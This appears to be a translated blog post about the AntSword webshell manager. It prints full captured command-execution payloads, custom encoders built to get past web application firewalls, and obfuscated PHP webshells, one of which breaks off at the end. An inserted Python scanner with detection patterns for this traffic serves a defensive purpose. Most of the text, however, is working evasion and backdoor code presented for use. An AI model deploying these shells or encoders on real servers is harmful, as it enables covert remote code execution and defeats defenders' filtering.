For the plugins, follow the official account and reply “蚁剑”.
Original traffic characteristics
User-Agent header
Newer AntSword versions pick a random User-Agent for each request; older versions send the fixed string antSword/v2.1.
It is configured in /modules/request.js:
// request User-Agent
const USER_AGENT = require('random-fake-useragent');
const { unescape } = require('querystring');
Base64 encoder
POST /vul/unsafeupload/uploads/1.php HTTP/1.1 Host: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0 Content-Length: 4504 ce17f0873fa1f6=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmUwM2VhNCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9JHRtZGlyPXJlYWxwYXRoKCR0bWRpcik7QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICJlMjciLiIxZWEiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjBiM2RkIi4iMzY4Yjc4Ijt9b2Jfc3RhcnQoKTt0cnl7JHA9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJzZmZiYjZlMTlhNjQ3MyJdLDIpKTskcz1iYXNlNjRfZGVjb2RlKHN1YnN0cigkX1BPU1RbIng2MzJhNzlhZWM2ZmYzIl0sMikpOyRlbnZzdHI9QGJhc2U2NF9kZWNvZGUoc3Vic3RyKCRfUE9TVFsiajIyMjU4MTg2Y2NlNjkiXSwyKSk7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI/Ii1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiO2lmKHN1YnN0cigkZCwwLDEpPT0iLyIpe0BwdXRlbnYoIlBBVEg9Ii5nZXRlbnYoIlBBVEgiKS4iOi91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL3NiaW46L3Vzci9iaW46L3NiaW46L2JpbiIpO31lbHNle0BwdXRlbnYoIlBBVEg9Ii5nZXRlbnYoIlBBVEgiKS4iO0M6L1dpbmRvd3Mvc3lzdGVtMzI7QzovV2luZG93cy9TeXNXT1c2NDtDOi9XaW5kb3dzO0M6L1dpbmRvd3MvU3lzdGVtMzIvV2luZG93c1Bvd2VyU2hlbGwvdjEuMC87Iik7fWlmKCFlbXB0eSgkZW52c3RyKSl7JGVudmFycj
1leHBsb2RlKCJ8fHxhc2xpbmV8fHwiLCAkZW52c3RyKTtmb3JlYWNoKCRlbnZhcnIgYXMgJHYpIHtpZiAoIWVtcHR5KCR2KSkge0BwdXRlbnYoc3RyX3JlcGxhY2UoInx8fGFza2V5fHx8IiwgIj0iLCAkdikpO319fSRyPSJ7JHB9IHskY30iO2Z1bmN0aW9uIGZlKCRmKXskZD1leHBsb2RlKCIsIixAaW5pX2dldCgiZGlzYWJsZV9mdW5jdGlvbnMiKSk7aWYoZW1wdHkoJGQpKXskZD1hcnJheSgpO31lbHNleyRkPWFycmF5X21hcCgndHJpbScsYXJyYXlfbWFwKCdzdHJ0b2xvd2VyJywkZCkpO31yZXR1cm4oZnVuY3Rpb25fZXhpc3RzKCRmKSYmaXNfY2FsbGFibGUoJGYpJiYhaW5fYXJyYXkoJGYsJGQpKTt9O2Z1bmN0aW9uIHJ1bnNoZWxsc2hvY2soJGQsICRjKSB7aWYgKHN1YnN0cigkZCwgMCwgMSkgPT0gIi8iICYmIGZlKCdwdXRlbnYnKSAmJiAoZmUoJ2Vycm9yX2xvZycpIHx8IGZlKCdtYWlsJykpKSB7aWYgKHN0cnN0cihyZWFkbGluaygiL2Jpbi9zaCIpLCAiYmFzaCIpICE9IEZBTFNFKSB7JHRtcCA9IHRlbXBuYW0oc3lzX2dldF90ZW1wX2RpcigpLCAnYXMnKTtwdXRlbnYoIlBIUF9MT0w9KCkgeyB4OyB9OyAkYyA+JHRtcCAyPiYxIik7aWYgKGZlKCdlcnJvcl9sb2cnKSkge2Vycm9yX2xvZygiYSIsIDEpO30gZWxzZSB7bWFpbCgiYUAxMjcuMC4wLjEiLCAiIiwgIiIsICItYnYiKTt9fSBlbHNlIHtyZXR1cm4gRmFsc2U7fSRvdXRwdXQgPSBAZmlsZV9nZXRfY29udGVudHMoJHRtcCk7QHVubGluaygkdG1wKTtpZiAoJG91dHB1dCAhPSAiIikge3ByaW50KCRvdXRwdXQpO3JldHVybiBUcnVlO319cmV0dXJuIEZhbHNlO307ZnVuY3Rpb24gcnVuY21kKCRjKXskcmV0PTA7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKGZlKCdzeXN0ZW0nKSl7QHN5c3RlbSgkYywkcmV0KTt9ZWxzZWlmKGZlKCdwYXNzdGhydScpKXtAcGFzc3RocnUoJGMsJHJldCk7fWVsc2VpZihmZSgnc2hlbGxfZXhlYycpKXtwcmludChAc2hlbGxfZXhlYygkYykpO31lbHNlaWYoZmUoJ2V4ZWMnKSl7QGV4ZWMoJGMsJG8sJHJldCk7cHJpbnQoam9pbigiCiIsJG8pKTt9ZWxzZWlmKGZlKCdwb3BlbicpKXskZnA9QHBvcGVuKCRjLCdyJyk7d2hpbGUoIUBmZW9mKCRmcCkpe3ByaW50KEBmZ2V0cygkZnAsMjA0OCkpO31AcGNsb3NlKCRmcCk7fWVsc2VpZihmZSgncHJvY19vcGVuJykpeyRwID0gQHByb2Nfb3BlbigkYywgYXJyYXkoMSA9PiBhcnJheSgncGlwZScsICd3JyksIDIgPT4gYXJyYXkoJ3BpcGUnLCAndycpKSwgJGlvKTt3aGlsZSghQGZlb2YoJGlvWzFdKSl7cHJpbnQoQGZnZXRzKCRpb1sxXSwyMDQ4KSk7fXdoaWxlKCFAZmVvZigkaW9bMl0pKXtwcmludChAZmdldHMoJGlvWzJdLDIwNDgpKTt9QGZjbG9zZSgkaW9bMV0pO0BmY2xvc2UoJGlvWzJdKTtAcHJvY19jbG9zZSgkcCk7fWVsc2VpZihmZSgnYW50c3lzdGVtJykpe0BhbnRzeXN0ZW0oJGMpO31lbHNlaWYocnVuc2hlbGxzaG9jaygkZCwgJGMpKSB7cmV0dXJuICRyZXQ7fW
Vsc2VpZihzdWJzdHIoJGQsMCwxKSE9Ii8iICYmIEBjbGFzc19leGlzdHMoIkNPTSIpKXskdz1uZXcgQ09NKCdXU2NyaXB0LnNoZWxsJyk7JGU9JHctPmV4ZWMoJGMpOyRzbz0kZS0+U3RkT3V0KCk7JHJldC49JHNvLT5SZWFkQWxsKCk7JHNlPSRlLT5TdGRFcnIoKTskcmV0Lj0kc2UtPlJlYWRBbGwoKTtwcmludCgkcmV0KTt9ZWxzZXskcmV0ID0gMTI3O31yZXR1cm4gJHJldDt9OyRyZXQ9QHJ1bmNtZCgkci4iIDI+JjEiKTtwcmludCAoJHJldCE9MCk/InJldD17JHJldH0iOiIiOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7&j22258186cce69=1l&sffbb6e19a6473=MQY21k&x632a79aec6ff3=6MY2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIDJjODI4JmNkJmVjaG8gMGYzNTMyMw==&xxy=@eval(@base64_decode($_POST['ce17f0873fa1f6']));
The base64 encoder works roughly like this: all of the intermediate operation functions are base64-encoded and finally executed with eval(base64_decode()). In the process, however, eval() and base64_decode are recognised and the request is blocked.
CHR encoder
POST /vul/unsafeupload/uploads/1.php HTTP/1.1 Host: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52 Content-Length: 27138 p6b4bef7012f21=ub&t8def9d1ac14f9=PJY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDM0ODUxJmNkJmVjaG8gNDEyMzY%3D&v9585f4ec5830f=7kY21k&xxy=%40eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(.......
As you can see, with the chr encoder all operation functions are encoded through CHR() and then executed with eval; this form passes straight through SafeDog.
CHR16 encoder
POST /vul/unsafeupload/uploads/1.php HTTP/1.1 Host: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E) Content-Length: 31892 ca9a2d11387c7e=2U&qc17c36e9b7b25=ITY21k&rfb799084cba76=LHY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDlhODI4MzgxNGUxJmNkJmVjaG8gYzA4N2MyYw%3D%3D&xxy=%40eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x70).ChR(0x6c).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x65).ChR(0x72).ChR(0x72).ChR(0x6f).
The chr16 form differs little from chr: all operation functions are again encoded through CHR() and executed with eval, only with the character codes written in hexadecimal.
ROT13 encoder
The rot13 encoder rot13-encodes all of the intermediate functions, so none of the key function names appear in the body, and finally executes them with eval(str_rot13()).
s8ac55604ca2c9=vx&u4163519a490b5=6tY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDE5MWY2OGEmY2QmZWNobyBiMDBjZjhmYg==&x23a3ea1c851b7=@vav_frg("qvfcynl_reebef", "0");@frg_gvzr_yvzvg(0);$bcqve=@vav_trg("bcra_onfrqve");vs($bcqve) {$bpjq=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);$bcnee=cert_fcyvg(onfr64_qrpbqr("Ymg8Bv8="),$bcqve);@neenl_chfu($bcnee,$bpjq,flf_trg_grzc_qve());sbernpu($bcnee nf $vgrz) {vs(!@vf_jevgnoyr($vgrz)){pbagvahr;};$gzqve=$vgrz."/.267494p3";@zxqve($gzqve);vs(!@svyr_rkvfgf($gzqve)){pbagvahr;}$gzqve=ernycngu($gzqve);@puqve($gzqve);@vav_frg("bcra_onfrqve", "..");$pagnee=@cert_fcyvg("/\\|//",$gzqve);sbe($v=0;$v<fvmrbs($pagnee);$v++){@puqve("..");};@vav_frg("bcra_onfrqve","/");@ezqve($gzqve);oernx;};};;shapgvba nfrap($bhg){erghea fge_ebg13($bhg);};shapgvba nfbhgchg(){$bhgchg=bo_trg_pbagragf();bo_raq_pyrna();rpub "2po"."s49q";rpub @nfrap($bhgchg);rpub "193n7"."41576q";}bo_fgneg();gel{$c=onfr64_qrpbqr(fhofge($_CBFG["k7p0qpp3610035"],2));$f=onfr64_qrpbqr(fhofge($_CBFG["h4163519n490o5"],2));$raifge=@onfr64_qrpbqr(fhofge($_CBFG["f8np55604pn2p9"],2));$q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);$p=fhofge($q,0,1)=="/"?"-p "{$f}"":"/p "{$f}"";vs(fhofge($q,0,1)=="/"){@chgrai("CNGU=".trgrai("CNGU").":/hfe/ybpny/fova:/hfe/ybpny/ova:/hfe/fova:/hfe/ova:/fova:/ova");}ryfr{@chgrai("CNGU=".trgrai("CNGU").";P:/Jvaqbjf/flfgrz32;P:/Jvaqbjf/FlfJBJ64;P:/Jvaqbjf;P:/Jvaqbjf/Flfgrz32/JvaqbjfCbjreFuryy/i1.0/;");}vs(!rzcgl($raifge)){$rainee=rkcybqr("|||nfyvar|||", $raifge);sbernpu($rainee nf $i) {vs (!rzcgl($i)) {@chgrai(fge_ercynpr("|||nfxrl|||", "=", $i));}}}$e="{$c} {$p}";shapgvba sr($s){$q=rkcybqr(",",@vav_trg("qvfnoyr_shapgvbaf"));vs(rzcgl($q)){$q=neenl();}ryfr{$q=neenl_znc('gevz',neenl_znc('fgegbybjre',$q));}erghea(shapgvba_rkvfgf($s)&&vf_pnyynoyr($s)&&!va_neenl($s,$q));};shapgvba ehafuryyfubpx($q, $p) {vs (fhofge($q, 0, 1) == "/" && sr('chgrai') && (sr('reebe_ybt') || sr('znvy'))) {vs (fgefge(ernqyvax("/ova/fu"), "onfu") != SNYFR) 
{$gzc = grzcanz(flf_trg_grzc_qve(), 'nf');chgrai("CUC_YBY=() { k; }; $p >$gzc 2>&1");vs (sr('reebe_ybt')) {reebe_ybt("n", 1);} ryfr {znvy("[email protected]", "", "", "-oi");}} ryfr {erghea Snyfr;}$bhgchg = @svyr_trg_pbagragf($gzc);@hayvax($gzc);vs ($bhgchg != "") {cevag($bhgchg);erghea Gehr;}}erghea Snyfr;};shapgvba ehapzq($p){$erg=0;$q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);vs(sr('flfgrz')){@flfgrz($p,$erg);}ryfrvs(sr('cnffgueh')){@cnffgueh($p,$erg);}ryfrvs(sr('furyy_rkrp')){cevag(@furyy_rkrp($p));}ryfrvs(sr('rkrp')){@rkrp($p,$b,$erg);cevag(wbva(" ",$b));}ryfrvs(sr('cbcra')){$sc=@cbcra($p,'e');juvyr(!@srbs($sc)){cevag(@strgf($sc,2048));}@cpybfr($sc);}ryfrvs(sr('cebp_bcra')){$c = @cebp_bcra($p, neenl(1 => neenl('cvcr', 'j'), 2 => neenl('cvcr', 'j')), $vb);juvyr(!@srbs($vb[1])){cevag(@strgf($vb[1],2048));}juvyr(!@srbs($vb[2])){cevag(@strgf($vb[2],2048));}@spybfr($vb[1]);@spybfr($vb[2]);@cebp_pybfr($c);}ryfrvs(sr('nagflfgrz')){@nagflfgrz($p);}ryfrvs(ehafuryyfubpx($q, $p)) {erghea $erg;}ryfrvs(fhofge($q,0,1)!="/" && @pynff_rkvfgf("PBZ")){$j=arj PBZ('JFpevcg.furyy');$r=$j->rkrp($p);$fb=$r->FgqBhg();$erg.=$fb->ErnqNyy();$fr=$r->FgqRee();$erg.=$fr->ErnqNyy();cevag($erg);}ryfr{$erg = 127;}erghea $erg;};$erg=@ehapzq($e." 2>&1");cevag ($erg!=0)?"erg={$erg}":"";;}pngpu(Rkprcgvba $r){rpub "REEBE://".$r->trgZrffntr();};nfbhgchg();qvr();&x7c0dcc3610035=xvY21k&xxy=@eval(@str_rot13($_POST['x23a3ea1c851b7']));
Default encoder
ca1c21df2b501a=luY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDRkMTFmYzImY2QmZWNobyBkMjUwOTFhNA==&p72ba1eefea205=rM&vcd1fb13a5c712=zbY21k&xxy=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.3ff308";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\|//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "a8e57"."c6a20";echo @asenc($output);echo "56"."4dd";}ob_start();try{$p=base64_decode(substr($_POST["vcd1fb13a5c712"],2));$s=base64_decode(substr($_POST["ca1c21df2b501a"],2));$envstr=@base64_decode(substr($_POST["p72ba1eefea205"],2));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = 
tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("[email protected]", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join(" ",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
The signature here is the @ini_set("display_errors", "0") prologue sent in plaintext.
Modifying AntSword's traffic obfuscation
b64pass encoder
/**
 * php::b64pass encoder
 *
 * Base64-encodes every POST parameter
 *
 * Works with this shell:
 *
 * <?php @eval(base64_decode($_POST['ant']));?>
 *
 */
'use strict';
module.exports = (pwd, data) => {
  // random parameter name that will carry the real payload
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  data[randomID] = Buffer.from(data['_']).toString('base64');
  // the loader under the password parameter is itself base64-encoded
  data[pwd] = Buffer.from(`eval(base64_decode($_POST[${randomID}]));die();`).toString('base64');
  delete data['_'];
  return data;
}
ant=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtfMHgxNmYwMzNjOTZmYmNjXSkpO2RpZSgpOw==&e84c55a2d1a848=HOY21k&jc3785466b27d1=rg&v530a18e4810bc=hNY2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIDljNjJhNmZhZGQxJmNkJmVjaG8gOGYzZTE2MzgzYg==
The eval(base64_decode()) from the original base64 packet is base64-encoded a second time, which gets past the security device's blocking of that string.
Double base64 encoder
/**
 * php::base64 encoder
 * Create at: 2020/11/21 15:21:10
 */
'use strict';
/*
 * @param {String} pwd   connection password
 * @param {Array}  data  payload array before the encoder runs
 * @return {Array} data  payload array after the encoder runs
 */
module.exports = (pwd, data, ext={}) => {
  // ########## write your own code below ###################
  // The code below is the PHP Base64 sample
  // generate a random variable name (unused in this variant)
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  // the original payload is in data['_']
  // take it out, base64-encode it and keep it under that key
  data['_'] = Buffer.from(data['_']).toString('base64');
  // once the shell receives the payload it first processes the content under the pwd parameter
  //data[pwd] = `${data['_']}"));`;
  // second base64 layer: the shell has to decode twice
  data[pwd] = Buffer.from(data['_']).toString('base64');
  // ########## write your own code above ###################
  // delete the original payload under _
  delete data['_'];
  // return the payload array after encoding
  return data;
}
Use the following webshell with it:
<?php
header('HTTP/1.1 404');
class COMI {
    public $c='';
    function __destruct() {
        return eval(substr($this->c, 0));
    }
}
$comi = new COMI();
$password = &$password1;
$password1 = $_REQUEST['password'];
$post = &$password;
// two base64 layers, matching the encoder
$post=base64_decode(base64_decode($post));
$lnng1 = &$lnng;
$lnng = $post;
$lnng2 = $lnng1;
@$comi->c = substr($lnng2, 0);
?>
kaba7e5c4d23f=1kY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDg4MDFhJmNkJmVjaG8gZjZmYTQ4Y2Y3&password=[double-base64 payload elided]%3D&s01f4f3921efb4=bf&x7121316358fb9=A0Y21k
The traffic is now fully obfuscated.
Base64-decoding the traffic twice yields the original data.
Time-based dynamic-key encoder
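Every encoder above changes only the outer wrapping: once the base64, rot13 or chr() layer is removed, the same @ini_set("display_errors", "0") prologue and the eval(base64_decode()) / eval(str_rot13()) loaders are still there. The following Python is an added example, not code from the original post or from AntSword, of a request-body scanner that peels those layers before matching. It covers the stock base64, chr, chr16, rot13 and default encoders described earlier as well as the b64pass and double-base64 variants just shown. The request bodies are constructed from one benign stub rather than taken from real captures; the indicator patterns and the handling of the two random prefix characters follow the payloads on this page.

```python
import base64
import codecs
import re
from urllib.parse import parse_qs, quote

# Indicators drawn from the captures above: the old fixed User-Agent, the
# eval(base64_decode()) / eval(str_rot13()) loaders, a long chr() chain, and
# the @ini_set("display_errors", "0") prologue every AntSword PHP payload
# starts with once its encoder layer is removed.
INDICATORS = {
    "ua_antsword": re.compile(r"antSword/v\d", re.I),
    "eval_base64": re.compile(r"eval\s*\(\s*@?base64_decode\s*\(", re.I),
    "eval_rot13": re.compile(r"eval\s*\(\s*@?str_rot13\s*\(", re.I),
    "chr_chain": re.compile(r"(?:chr\s*\(\s*(?:0x[0-9a-f]+|\d+)\s*\)\s*\.\s*){4,}", re.I),
    "ini_set_stub": re.compile(r"@ini_set\s*\(\s*[\"']display_errors[\"']\s*,\s*[\"']0[\"']", re.I),
}
CHR_ARG = re.compile(r"chr\s*\(\s*(0x[0-9a-f]+|\d+)\s*\)", re.I)


def layers(value):
    """Return the parameter value plus every plaintext hidden under the stock encoders.

    base64 is peeled up to three times (double-base64 encoder), both from the
    start of the value and after the two random prefix characters the default
    encoder adds (the shell does substr($_POST[...], 2)); rot13 and chr()
    chains are decoded as well.
    """
    out = [value]
    for start in (value, value[2:]):
        cur = start
        for _ in range(3):
            try:
                cur = base64.b64decode(cur, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                break
            out.append(cur)
    out.append(codecs.decode(value, "rot13"))
    nums = CHR_ARG.findall(value)
    if len(nums) >= 4:
        out.append("".join(chr(int(n, 16) if n.lower().startswith("0x") else int(n)) for n in nums))
    return out


def scan_request(body, user_agent=""):
    """Return the sorted indicator names that fire on one request body and User-Agent."""
    hits = set()
    if INDICATORS["ua_antsword"].search(user_agent):
        hits.add("ua_antsword")
    for values in parse_qs(body, keep_blank_values=True).values():
        for value in values:
            for text in layers(value):
                for name, rx in INDICATORS.items():
                    if name != "ua_antsword" and rx.search(text):
                        hits.add(name)
    return sorted(hits)


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed sample bodies (not real captures): one benign stub wrapped the way
# each encoder on this page wraps it. quote() mimics the client's URL-encoding.
STUB = '@ini_set("display_errors", "0");@set_time_limit(0);echo "constructed sample";'
SAMPLE_BODIES = {
    "default": "xxy=" + quote(STUB, safe=""),
    "base64": "xxy=" + quote("@eval(@base64_decode($_POST['p1']));", safe="")
              + "&p1=" + quote("Zz" + _b64(STUB), safe=""),
    "b64pass": "ant=" + quote(_b64("eval(base64_decode($_POST[_0x1]));die();"), safe="")
               + "&_0x1=" + quote(_b64(STUB), safe=""),
    "double_b64": "password=" + quote(_b64(_b64(STUB)), safe=""),
    "rot13": "xxy=" + quote("@eval(@str_rot13($_POST['p1']));", safe="")
             + "&p1=" + quote(codecs.encode(STUB, "rot13"), safe=""),
    "chr": "xxy=" + quote("@eVAl(" + ".".join(f"ChR({ord(c)})" for c in STUB) + ");", safe=""),
    "chr16": "xxy=" + quote("@eVAl(" + ".".join(f"ChR({ord(c):#x})" for c in STUB) + ");", safe=""),
}


def scan_samples():
    """Run the scanner over every constructed body; maps encoder name -> indicators hit."""
    return {name: scan_request(body) for name, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:11s} -> {', '.join(hits) or 'nothing'}")
```

A filter that matches only the literal strings eval and base64_decode, which is the blocking the page describes, sees nothing in the chr, rot13 and double-base64 bodies; matching after the layers are peeled flags all of them on the prologue, and the chr chain is additionally flagged as a chain before it is decoded.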
'use strict';
// Time-based AntSword dynamic-key encoder
// link: https://yzddmr6.tk/posts/antsword-xor-encoder/
// code by yzddmr6
/* Server side
<?php
date_default_timezone_set("PRC");
@$post=base64_decode($_REQUEST['yzddmr6']);
$key=md5(date("Y-m-d H:i",time()));
for($i=0;$i<strlen($post);$i++){
    $post[$i] = $post[$i] ^ $key[$i%32];
}
eval($post);
?>
*/
module.exports = (pwd, data, ext={}) => {
  function xor(payload){
    let crypto = require('crypto');
    // add a Date method that formats the current time with the same layout PHP's date("Y-m-d H:i") produces
    Object.assign(Date.prototype, {
      switch (time) {
        let date = {
          "yy": this.getFullYear(),
          "MM": this.getMonth() + 1,
          "dd": this.getDate(),
          "hh": this.getHours(),
          "mm": this.getMinutes(),
          "ss": this.getSeconds()
        };
        if (/(y+)/i.test(time)) {
          time = time.replace(RegExp.$1, (this.getFullYear() + '').substr(4 - RegExp.$1.length));
        }
        Object.keys(date).forEach(function (i) {
          if (new RegExp("(" + i + ")").test(time)) {
            if (RegExp.$1.length == 2) {
              date[i] < 10 ? date[i] = '0' + date[i] : date[i];
            }
            time = time.replace(RegExp.$1, date[i]);
          }
        })
        return time;
      }
    })
    let newDate = new Date();
    let time = newDate.switch('yyyy-MM-dd hh:mm');
    // key = md5 of the current minute, used as 32 ASCII hex characters
    let key = crypto.createHash('md5').update(time).digest('hex')
    key=key.split("").map(t => t.charCodeAt(0));
    //let payload="phpinfo();";
    // XOR every payload character with the key, cycling every 32 bytes
    let cipher = payload.split("").map(t => t.charCodeAt(0));
    for(let i=0;i<cipher.length;i++){
      cipher[i]=cipher[i]^key[i%32]
    }
    cipher=cipher.map(t=>String.fromCharCode(t)).join("")
    cipher=Buffer.from(cipher).toString('base64');
    //console.log(cipher)
    return cipher;
  }
  data['_'] = Buffer.from(data['_']).toString('base64');
  data[pwd] = `eval(base64_decode("${data['_']}"));`;
  data[pwd]=xor(data[pwd]);
  delete data['_'];
  return data;
}
This encoder uses the md5 of the current time as the key for an XOR and transports the result in base64. When the shell receives the encoded data it first base64-decodes it, then XORs it once more with the md5 of the time to get the plaintext.
Corresponding webshell
<?php
header('HTTP/1.1 404');
class COMI {
    public $c='';
    function __destruct() {
        return eval(substr($this->c, 0));
    }
}
date_default_timezone_set("PRC");
$comi = new COMI();
$password = &$password1;
$password1 = $_REQUEST['x'];
$post = &$password;
$post=base64_decode($post);
